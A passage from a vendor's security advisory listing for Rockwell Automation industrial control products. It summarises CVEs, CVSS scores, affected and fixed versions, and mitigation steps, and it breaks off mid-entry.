Users can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

Mitigations and Workarounds

Customers using the affected software that are unable to upgrade to the corrected versions should use security best practices.

Security Best Practices

ADDITIONAL RESOURCES

JSON CVE 2024-21914

Glossary

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

Critical

SD1662 | FactoryTalk® Service Platform Elevated Privileges Vulnerability Through Web Service Functionality

Published Date:

February 14, 2024

Last Updated:

December 04, 2024

CVE IDs:

CVE-2024-21915

Products:

FactoryTalk® Service Platform

CVSS Scores (v3.1):

9.0

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Published Date: February 15, 2024
Last updated: August 5, 2025
Revision Number: 1.0
CVSS Score: 9.0/10

The security of our products is important to us as your industrial automation supplier. This issue was found internally during routine testing and is being reported based on our commitment to transparency and all business environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	First Known in software version	Corrected in software version
FactoryTalk® Service Platform	<v2.74	Update to V2.74 or later

SECURITY ISSUE DETAILS

Rockwell Automation used version 3.1 of the CVSS scoring system to assess the following security issues.

CVE-2024-21915 IMPACT

A privilege escalation security issue exists in FactoryTalk® Service Platform (FTSP). A threat actor with basic user group privileges could sign into the software and receive FTSP Administrator Group privileges. A threat actor could then read and modify sensitive data, delete data and render the FTSP system unavailable.

CVSS Base Score: 9.0
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:CC:H/I:H/A:H
CWE: CWE-279: Incorrect Execution-Assigned Permissions

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment specific categories.

Mitigations and Workarounds

Customers using the affected software that cannot upgrade to the corrected versions should use mitigations and security best practices

Security Best Practices

ADDITIONAL RESOURCES

Glossary

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

Privilege escalation: cyberattack technique where an attacker gains unauthorized access to higher-level privileges within a system, allowing them to perform actions that are typically restricted.

High

SD1661 | Denial-of-service Vulnerability in ControlLogix® and GuardLogix® Controllers

Published Date:

January 30, 2024

Last Updated:

November 20, 2024

CVE IDs:

CVE-2024 21916

Products:

ControlLogix® 5570, GuardLogix® 5570, ControlLogix® 5570 Redundancy

CVSS Scores (v3.1):

8.6

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Denial-of-service Vulnerability in ControlLogix® and GuardLogix® Controllers

Published Date: January 30, 2024

Last updated: 1.0

Revision Number: 1.0

CVSS Score: 8.6

AFFECTED PRODUCTS AND SOLUTION

Affected Product	First Known in Firmware	Corrected in Firmware
ControlLogix® 5570	20.011	v33.016, 34.013, 35.012, 36.011 and later
GuardLogix® 5570	20.011	v33.016, 34.013, 35.012, 36.011 and later
ControlLogix® 5570 Redundancy	20.054_kit1	v33.053_kit1, 34.052_kit1, 35.052_kit1, 36.051_kit1 and later

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024 21916 IMPACT

A denial-of-service vulnerability exists in the affected products, listed above. If exploited, the product could potentially experience a major nonrecoverable fault (MNRF). The device will restart itself to recover from the MNRF .

CVSS Base Score: 8.6

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CWE: Improper Restriction of Operations within the Bounds of a Memory Buffer

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

JSON CVE 2024 21916

Critical

SD1660 | FactoryTalk® Service Platform Service Token Vulnerability

Published Date:

January 30, 2024

Last Updated:

December 04, 2024

CVE IDs:

CVE-2024 21917

Products:

FactoryTalk® Service Platform

CVSS Scores (v3.1):

9.8

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: January 30, 2024

Revision History

Version 1.0 - March 5th, 2024 *Updated Mitigations and Workarounds

Version 1.1 - July 18, 2025 - Updated for readability

Revision Number: 1.1

CVSS Score: 9.8/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product	First Known in software version	Corrected in software version
FactoryTalk® Service Platform	<= v6.31	v6.40 or later

SECURITY ISSUE DETAILS

Rockwell Automation used CVSS v3.1 scoring system to assess the following security issues.

CVE - 2024 21917 IMPACT

A security issue exists in the affected product. This allows a malicious user to obtain the service token and use it for authentication on another FactoryTalk® Service Platform (FTSP) directory. This is due to the lack of digital signing between the FTSP service token and directory. A threat actor could potentially retrieve user information and modify settings without any authentication.

CVSS Base Score: 9.8/10 (Critical)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: 347 Improper Verification of Cryptographic Signature

Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds

Customers using the affected software should use risk mitigations and our suggested security best practices to minimize the risks.

Customers updating to v6.40 or later should do one of the following steps:

Set the FactoryTalk Directory’s System Communications Type security policy to SOCKET.IO. This prevents FactoryTalk Services Platform from using the DCOM communication channel. When set to SOCKET.IO only v6.40, and later, FactoryTalk Directory clients can communicate with the FactoryTalk Directory server.
If the v6.40 (or later) FactoryTalk Directory server must support communication with legacy FactoryTalk Directory client versions, v6.31 and earlier,  System Communication Type setting should not be altered from AUTO or DCOM.
Instead, elevate DCOM Authentication Level to PACKET PRIVACY (‘6’). Please refer to Mitigating Microsoft DCOM Hardening Patch (CVE-2021-26414) for Affected Rockwell Automation Products (custhelp.com)

IMPORTANT! Two v 6.40 (or later) FactoryTalk Directory security policies can prevent legacy FactoryTalk Directory clients, v6.31 and earlier, from connecting with the FactoryTalk Directory server. Set both security policies Legacy to allow the connection.
The two security policies are the Service Token signature method and Encryption method.

Customers who are unable to update to v6.40 or later should apply the following:

Set DCOM authentication level to 6. This enables encryption of the service token and communication channel between the server and client. Please refer to Mitigating Microsoft DCOM Hardening Patch (CVE-2021-26414) for Affected Rockwell Automation Products (custhelp.com)
When it is not possible to update to v6.40 or later, enable verification of the publisher information (i.e., digital signature) of any executable attempting to use the FactoryTalk® Services APIs. This helps prevent a threat actor from calling the API to receive the service token. This setting can be changed from the Application Authorization node located within System Policies using the FactoryTalk® Administration Console application.
Security Best Practices

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment specific categories.

ADDITIONAL RESOURCES

JSON CVE 2024 21917

Glossary

Application Programming Interface: (API) is a set of protocols and tools that allow different software applications to communicate with each other.

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

High

SD1659 | LP30/40/50 and BM40 Operator Interface Vulnerable to CODESYS Vulnerabilities

Published Date:

January 24, 2024

Last Updated:

December 01, 2024

CVE IDs:

CVE-2022-47378, CVE-2022-47379, CVE-2022-47380, CVE-2022-47381 , CVE-2022-47382, CVE-2022-47383, CVE-2022-47384, CVE-2022-47386, CVE-2022-47387, CVE-2022-47388, CVE-2022-47389, CVE-2022-47390, CVE-2022-47385 , CVE-2022-47392 , CVE-2022-47393

Products:

LP30 Operator Panel, LP40 Operator Panel, BM40 Operator Panel, LP50 Operator Panel

CVSS Scores (v3.1):

6.5, 8.8

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Published Date: January 25, 2024

Last updated: January 25, 2024

Revision Number: 1.0

CVSS Score: 8.8

AFFECTED PRODUCTS AND SOLUTION

Affected Product (automated)	First Known in Software Revision	Corrected in Software Revision
LP30 Operator Panel	Codesys versions before V3.5.19.0	Codesys 3.5.19.2
LP40 Operator Panel	Codesys versions before V3.5.19.0	Codesys 3.5.19.2
BM40 Operator Panel	Codesys versions before V3.5.19.0	Codesys 3.5.19.2
LP50 Operator Panel	Codesys versions before V3.5.19.0	Codesys 3.5.19.2

VULNERABILITY DETAILS

The CODESYS Control runtime system is utilized in the affected ASEM™ (A Rockwell Automation Company) products and enables embedded or PC-based devices to be programmable industrial controllers. Such products contain communication servers for the CODESYS protocol to enable communication with clients like the CODESYS Development System.

These products have the following vulnerabilities:

CVE-2022-47378 IMPACT

CVSS Base Score: 6.5/10 (Medium)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE-1288: Improper Validation of Consistency within Input

After successful authentication, specifically crafted communication requests with inconsistent content can cause the CmpFiletransfer component to read internally from an invalid address, potentially leading to a denial-of-service condition.

CVE-2022-47379 IMPACT

CVSS Base Score: 8.8/10 (High)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE-787: Out-of-bounds Write

After successful authentication, specifically crafted communication requests can cause the CmpApp component to write threat actor-controlled data to memory, which can lead to a denial-of-service condition, memory overwriting, or remote code execution.

CVE-2022-47380, CVE-2022-47381 IMPACT

CVSS Base Score: 8.8/10 (High)

CWE-121: Stack-based Buffer Overflow

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

After successful authentication, specifically crafted communication requests can cause the CmpApp component to write threat actor-controlled data to stack, which can lead to a denial-of-service condition, memory overwriting, or remote code execution.

CVE-2022-47382, CVE-2022-47383, CVE-2022-47384, CVE-2022-47386, CVE-2022-47387, CVE-2022-47388, CVE-2022-47389, CVE-2022-47390 IMPACT

CVSS Base Score: 8.8/10 (High)

CWE-121: Stack-based Buffer Overflow

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

After successful authentication, specifically crafted communication requests can cause the CmpTraceMgr

component to write threat actor-controlled data to stack, which can lead to a denial-of-service condition, memory overwriting, or remote code execution.

CVE-2022-47385 IMPACT

CVSS Base Score: 8.8/10 (High)

CWE-121: Stack-based Buffer Overflow

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

After successful authentication, specifically crafted communication requests can cause the CmpAppForce

component to write threat actor-controlled data to stack, which can lead to a denial-of-service condition, memory overwriting, or remote code execution.

CVE-2022-47392 IMPACT

CVSS Base Score: 6.5/10 (Medium)

CWE-1288: Improper Validation of Consistency within Input

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

After successful authentication, specifically crafted communication requests with inconsistent content can cause the CmpApp/CmpAppBP/CmpAppForce components to read internally from an invalid address, potentially leading to a denial-of-service condition.

CVE-2022-47393 IMPACT

CVSS Base Score: 6.5/10 (Medium)

CWE-822: Untrusted Pointer Dereference

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

After successful authentication, specifically crafted communication requests can cause the cmpFiletransfer component to dereference addresses provided by the request for internal read access, which can lead to a denial-of-service situation.

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible.

Upgrade to CODESYS version 3.5.19.2 which has been released to mitigate these issues.
Additionally, we encourage the customer to implement our suggested security best practices to minimize risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

CODESYS Advisory

High

SD1658 | SD1658 | SIS Workstation and ISaGRAF Workbench Code Execution and Privilege Escalation

Published Date:

November 15, 2023

Last Updated:

November 15, 2023

CVE IDs:

CVE-2015-9268

Products:

Safety Instrumented System Workstation, ISaGRAF® Workbench

CVSS Scores:

7.8

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Published Date: November 14, 2023

Last updated: November 14, 2023

Revision Number: 1.0

CVSS Score: 7.8/10

The security of our products is important to us as your chosen industrial automation supplier. This vulnerability was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	First Known in Software Version	Corrected in Software Version
Safety Instrumented System Workstation	<= v1.2	v2.00 and later
ISaGRAF® Workbench	<= v6.6.9	v6.06.10 and later

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2015-9268 IMPACT

Due to the third-party vulnerabilities in Nullsoft Scriptable Install System (NSIS), the SIS Workstation and ISaGRAF® Workbench installer and uninstaller have unsafe implicit linking against Version.dll. Therefore, there is no protection mechanism in the wrapper function that resolves the dependency at an appropriate time during runtime. Also, the SIS workstation and ISaGRAF® Workbench uninstaller uses temporary folder locations that allow unprivileged local users to overwrite files. This allows a local attack in which the uninstaller can be replaced by a malicious program.

CVSS Base Score: 7.8/10

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE: Improper Input Validation

Known Exploited Vulnerability (KEV) database:

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

Security Best Practices

ADDITIONAL RESOURCES

CVE-2015-9268 JSON

Critical

SD1657 | FactoryTalk® Activation Contains Wibu CodeMeter Vulnerabilities

Published Date:

November 15, 2023

Last Updated:

November 19, 2024

CVE IDs:

CVE-2023-38545, CVE-2023-3935

Products:

FactoryTalk Activation Manager

CVSS Scores (v3.1):

7.9, 9.8

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Published Date: November 14, 2023

Last updated: November 14, 2023

Revision Number: 1.0

CVSS Score: 7.8

AFFECTED PRODUCTS AND SOLUTION

Affected Product (automated)	First Known in Software Version	Corrected in Software Version
FactoryTalk Activation Manager	V4.00 (Utilizes Wibu-Systems CodeMeter <7.60c)	5.01

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-38545 IMPACT

Rockwell Automation FactoryTalk Activation Manager and Studio 5000 Logix Designer uses the affected Wibu-Systems’ products which internally use the libcurl in a version that is vulnerable to a buffer overflow attack if curl is configured to redirect traffic through a SOCKS5 proxy. A malicious proxy can exploit a bug in the implemented handshake to cause a buffer overflow. If no SOCKS5 proxy has been configured, there is no attack surface.

CVSS Base Score: 7.9

CVSS Vector: CVSS:3.1/ AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-787 Out-of-bounds Write

Known Exploited Vulnerability (KEV) database: No

CVE-2023-3935 IMPACT

Rockwell Automation FactoryTalk Activation Manager and Studio 5000 Logix Designer uses the affected Wibu-Systems’ products which contain a heap buffer overflow vulnerability in Wibu CodeMeter Runtime network service up to version 7.60b that allows an unauthenticated, remote attacker to achieve RCE and gain full access of the host system.

CVSS Base Score: 9.8

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-787 Out-of-bounds Write

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible.

Upgrade to FactoryTalk Activation Manager 5.01 which has been patched to mitigate these issues (Available versions here, search "activation")
For information on how to mitigate Security Risks on industrial automation control systems Additionally, we encourage the customer to implement our suggested security best practices to minimize risk of the vulnerability.

ADDITIONAL RESOURCES

High

PN1656 | FactoryTalk® View Site Edition Vulnerable to Improper Input Validation

Published Date:

October 31, 2023

Last Updated:

December 10, 2024

CVE IDs:

CVE-2023-46289

Products:

FactoryTalk® View Site Edition

CVSS Scores (v3.1):

7.5

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – October 26, 2023

Executive Summary

The security of our products is important to us as your chosen industrial automation supplier. This vulnerability was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

Affected Products

Affected Product	First Known in Software Version	Corrected in Software Version
FactoryTalk® View Site Edition	V11.0	v11.0 & v12.0 & v13.0 patch

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-46289 IMPACT
The affected product insufficiently validates user input, which could potentially allow threat actors to send malicious data bringing the product offline. If exploited, the product would become unavailable and require a restart to recover resulting in a denial-of-service condition.

CVSS Base Score: 7.5/10 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE: CWE-20: Improper Input Validation

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

Install the patch that remediates the issue: BF29581 - Patch: External Service Interaction (HTTP), FactoryTalk View SE 11.0, 12.0 13.0.
QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

CVE-2023-46289 JSON

High

PN1655 | FactoryTalk® Services Platform Elevated Privileges Vulnerability

Published Date:

October 31, 2023

Last Updated:

December 10, 2024

CVE IDs:

CVE-2023-46290

Products:

FactoryTalk® Services Platform

CVSS Scores (v3.1):

8.1

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – October 26, 2023

Executive Summary

The security of our products is important to us as your chosen industrial automation supplier. This vulnerability was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

Affected Products

Affected Product	First Known in Software Version	Corrected in Software Version
FactoryTalk® Services Platform	v2.74	V2.80 and later

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-46290 IMPACT
Due to inadequate code logic, a previously unauthenticated threat actor could potentially obtain a local Windows OS user token through the FactoryTalk® Services Platform web service and then use the token to log in into FactoryTalk® Services Platform . This vulnerability can only be exploited if the authorized user did not previously log in into the FactoryTalk® Services Platform web service.

CVSS Base Score: 8.1/10 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-287: Improper Authentication

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

Install the respective FactoryTalk Services Version that remediates the issue.
QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

CVE-2023-46290 JSON

High

PN1654 | Arena® Simulation Buffer Overflow Vulnerabilities

Published Date:

October 31, 2023

Last Updated:

December 10, 2024

CVE IDs:

CVE-2023-27854, CVE-2023-27858

Products:

Arena® Simulation Software

CVSS Scores (v3.1):

7.8

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – October 27, 2023

Affected Products

Affected Product (automated)	First Known in Software Version	Corrected in Software Version
Arena® Simulation Software	V16.00	16.20.02

Vulnerability Details

These vulnerabilities were reported to Rockwell Automation by Michael Heinzl. Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-27854 IMPACT
An arbitrary code execution vulnerability was reported to Rockwell Automation that could potentially allow a malicious user to commit unauthorized arbitrary code to the software by using a memory buffer overflow. The threat-actor could then execute malicious code on the system affecting the confidentiality, integrity, and availability of the product. The user would need to open a malicious file provided to them by the attacker for the code to execute.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-125 Out-of-bounds Read

Known Exploited Vulnerability (KEV) database: No

CVE-2023-27858 IMPACT
An arbitrary code execution vulnerability could potentially allow a malicious user to commit unauthorized code to the software by using a uninitialized pointer in the application. The threat-actor could then execute malicious code on the system affecting the confidentiality, integrity, and availability of the product. The user would need to open a malicious file provided to them by the attacker for the code to execute.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-824: Access of Uninitialized Pointer

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible.

Upgrade to 16.20.02 which has been patched to mitigate these issues, by referencing BF29820 - Patch: ZDI Security Patch & Windows 11 updates , Arena 16.2.
Implement our QA43240 - Recommended Security Guidelines from Rockwell Automation to minimize risk of the vulnerability.

Additional Resources

Critical

PN1653 | Stratix® 5800 and 5200 vulnerable to Cisco IOS XE Web UI Privilege Escalation (Active Exploit)

Published Date:

October 18, 2023

Last Updated:

December 10, 2024

CVE IDs:

CVE-2023-20198

Products:

Stratix® 5200, Stratix® 5800

CVSS Scores (v3.1):

7.2, 10

Known Exploited Vulnerability (KEV):

Yes

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 10/17/2023
Last updated: 02/14/2024
Revision Number: 2.0
Revision History: Updated Corrected in firmware revision
CVSS Score: 10/10

Rockwell Automation is aware of an actively exploited zero-day vulnerability affecting the Stratix® 5800 and the newly released Stratix® 5200 product. This vulnerability was reported by Cisco on October 16, 2023 and additional information can be found in their original disclosure. As of the time of publication, no patch is available for this vulnerability and multiple cases of active exploitation have been observed. While Rockwell Automation has no evidence of active exploitation against the Stratix® product line, this vulnerability was discovered by Cisco Talos during an incident response for a Cisco customer. This advisory will be updated, as remediation steps become available.

REVISION 1.1 UPDATE

Since publication of the original disclosure, the exploit code has become publicly available. Availability of exploit code reduces the technical barriers for threat actors to target the affected devices. Rockwell Automation has no evidence of active exploitation against the Stratix® product line currently. This advisory has been updated to include specific steps to take to create access control measures utilizing the Web UI. Rockwell Automation strongly encourages customers to follow the mitigation guidelines.

REVISION 2.0 UPDATE

Rockwell Automation has released a software update that remediates the vulnerabilities in the affected products. We strongly recommend customers update to the corrected firmware revision as soon as possible.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	First known in firmware revision	Corrected in Firmware Revision
Stratix® 5200, 5800	All versions running Cisco IOS XE Software with the Web UI feature enabled	17.12.02

VULNERABILITY DETAILS

CVE-2023-20198 IMPACT

Rockwell Automation is aware of active exploitation of a previously unknown vulnerability in the Web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated threat actor to create an account on a vulnerable system with privilege level 15 access. The threat actor could then potentially use that account to gain control of the affected system.

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVSS Base Score: 10/10 (high)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Known Exploited Vulnerability (KEV) database: Yes

CVE-2023-20273 IMPACT

Rockwell Automation is aware of active exploitation of a previously unknown vulnerability in the Web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability could allow an authenticated, remote threat actor to inject commands with the privileges of root. This vulnerability is due to insufficient input validation. A threat actor could exploit this vulnerability by sending crafted input to the web UI. A successful exploit could allow the threat actor to inject commands to the underlying operating system with root privileges.

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVSS Base Score: 7.2/10 (high)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Known Exploited Vulnerability (KEV) database: Yes

Mitigations and Workarounds

Rockwell strongly encourages customers to follow guidance disabling Stratix® HTTP servers on all internet-facing systems.

To disable the HTTP Server feature, use the no ip http server or no ip http secure-server command in global configuration mode. If both the HTTP server and HTTPS server are in use, both commands are required to disable the HTTP Server feature.
Cisco Talos has provided Indicators of Compromise and Snort rules that can be found here.

REVISION 1.1 UPDATE

Access Control Lists should be enabled to only allow specific IP addresses to access the Web UI of the device. Detailed instructions on how to create the Access Control List is in QA67053.
When implementing access controls for these services, be sure to review the controls because there is the potential for an interruption in production services.

ADDITIONAL RESOURCES

High

PN1652 | PN1652 | FactoryTalk® Linx Vulnerable to Denial-of-Service and Information Disclosure

Published Date:

October 17, 2023

Last Updated:

October 17, 2023

CVE IDs:

CVE-2023-29464

Products:

FactoryTalk® Linx

CVSS Scores:

8.2

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – October 12, 2023

Affected Products

Affected Product	First Known in Revision	Corrected in Revision
FactoryTalk® Linx	v6.20	v6.20 & v6.30 patch

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. Rockwell Automation would like to thank Yuval Gordon, CPS Research, Microsoft Threat Intelligence Community for reporting this vulnerability to us.

CVE-2023-29464 IMPACT

FactoryTalk Linx, in the Rockwell Automation PanelView™ Plus, allows an unauthenticated threat actor to read data from memory via crafted malicious packets. Sending a size larger than the buffer size results in leakage of data from memory resulting in an information disclosure. If the size is large enough, it causes communications over the common industrial protocol to become unresponsive to any type of packet, resulting in a denial-of-service to FactoryTalk® Linx over the common industrial protocol.

CVSS Base Score: 8.2/10 (high)
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
CWE: 20 – Improper Input Validation

Risk Mitigation & User Action

Customers using the affected versions are encouraged to upgrade to corrected firmware revisions. We also strongly encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Install the security patches for the respective versions, referencing BF29637 - Patch: Hardening of the FactoryTalk Linx communications service for MobileView to authenticate and block improperly sized files, FactoryTalk Linx 6.20, 6.30.
QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

JSON CVE-2023-29464

Critical

PN1649 | PN1649 | Select Logix Communication Modules Vulnerable to Email Object Buffer Overflow

Published Date:

October 09, 2023

Last Updated:

October 09, 2023

CVE IDs:

CVE-2023-2262

Products:

ControlLogix Communication - Ethernet/IP

CVSS Scores:

9.8

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – September 19, 2023

Executive Summary

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments. This vulnerability is not related to PN1633 - Remote Code Execution and Denial-of-Service Vulnerabilities in Select Communication Modules .

Affected Products

Affected Catalog	Series	Affected Firmware Version	Corrected in Firmware Version
1756-EN2T 1756-EN2TK 1756-EN2TXT	A, B, C	<=5.008 and 5.028	Update to 5.009 and 5.029 or later
1756-EN2T 1756-EN2TK 1756-EN2TXT	D	<=11.002	Update to >=11.003 or later
1756-EN2TP 1756-EN2TPK 1756-EN2TPXT	A	<=11.002	Update to >=11.003 or later
1756-EN2TR 1756-EN2TRK 1756-EN2TRXT	A, B	<=5.008 and 5.028	Update to 5.009 and 5.029 or later
1756-EN2TR 1756-EN2TRK 1756-EN2TRXT	C	<=11.002	Update to >=11.003 or later
1756-EN2F 1756-EN2FK	A, B	<=5.008 and 5.028	Update to 5.009 and 5.029 or later
1756-EN2F 1756-EN2FK	C	<=11.002	Update to >=11.003 or later
1756-EN3TR 1756-EN3TRK	A	<=5.008 and 5.028	Update to 5.009 and 5.029 or later
1756-EN3TR 1756-EN3TRK	B	<=11.002	Update to >=11.003 or later

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-2262 IMPACT
A buffer overflow vulnerability exists in select communication devices. If exploited, a threat actor could potentially leverage this vulnerability to perform a remote code execution. To exploit this vulnerability, a threat actor would have to send a maliciously crafted CIP request to device.

CVSS Base Score: 9.8/10
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-121: Stack-based Buffer Overflow

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

Restrict traffic to the SMTP port (25), if not needed.
Customers using the EN2/EN3 versions 10.x and higher can disable the email object, if not needed. Instructions can be found in the EtherNet/IP Network Devices User Manual (rockwellautomation.com), publication ENET-UM006.
QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

Critical

PN1648 | PN1648 | Connected Components Workbench™ Vulnerable to CefSharp Vulnerabilities

Published Date:

October 05, 2023

Last Updated:

October 05, 2023

CVE IDs:

CVE-2020-16017, CVE-2022-0609, CVE-2020-16009, CVE-2020-16013, CVE-2020-15999

Products:

Connected Components Workbench (CCW)

CVSS Scores:

9.6, 8.8, 8.8, 8.8, 6.5

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – September 19, 2023

Executive Summary

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

Affected Products

Affected Product	Affected Versions	Corrected in Software Version
Connected Components Workbench™ (CCW)	Versions Prior to R21	R21 and later

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2020-16017 IMPACT
Connected Components Workbench utilizes CefSharp version 81.3.100 that contains a use after free vulnerability in Google Chrome versions before 86.0.4240.198. If exploited, a remote threat actor could potentially perform a sandbox escape via a crafted HTML page.

CVSS Base Score: 9.6/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
CWE: 416 – Use After Free

Known Exploited Vulnerability (KEV) database: Yes

CVE-2022-0609 IMPACT
